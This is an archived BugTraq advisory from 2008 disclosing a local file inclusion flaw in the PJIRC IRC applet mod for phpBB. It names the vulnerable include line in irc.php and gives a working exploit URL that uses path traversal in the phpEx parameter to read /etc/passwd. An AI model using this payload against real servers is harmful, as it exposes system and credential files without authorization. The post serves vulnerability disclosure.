BugTraq
phpBB PJIRC mod LFI Mar 25 2008 08:19PM
0in email gmail com
/*

PJIRC mod phpBB Local File Include

Discrovered by: 0in from DaRk-CodeRs Programming & Security Group!

Contact: 0in(dot)email[at]gmail(dot)com

Description: This is a simply irc applet to phpbb.

Download: http://www.hotscripts.pl/produkt-1998.html

HTTP://Dark-Coders.4rh.eu

Greetz to: All DaRk-CodeRs Team Members: die_anglel, m4r1usz, sun8hclf, djlinux, aristo89

*/

$phpEx not defined ;(

Vuln line:

./irc.php:31 include($php_root_path. 'common.' .$phpEx);

Exploit:

http://target.com/[path]/irc.php?phpEx=[LFI]

Ex.

http://target.com/forum/irc/irc.php?phpEx=./../../../../../../etc/passwd

//EoFF

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus